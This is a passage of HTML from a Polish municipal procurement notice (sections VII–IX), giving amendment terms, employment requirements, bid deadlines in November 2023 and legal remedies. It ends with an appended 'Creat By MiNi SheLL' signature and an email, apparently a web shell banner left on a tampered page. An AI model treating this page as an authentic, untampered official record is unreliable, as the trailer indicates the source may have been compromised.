class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania został określony w projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-16 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ug_szczytno/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-16 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów Ustawy pzp, przysługują środki ochrony prawnej określone w dziale IX Ustawy pzp.

Creat By MiNi SheLL
Email: jattceo@gmail.com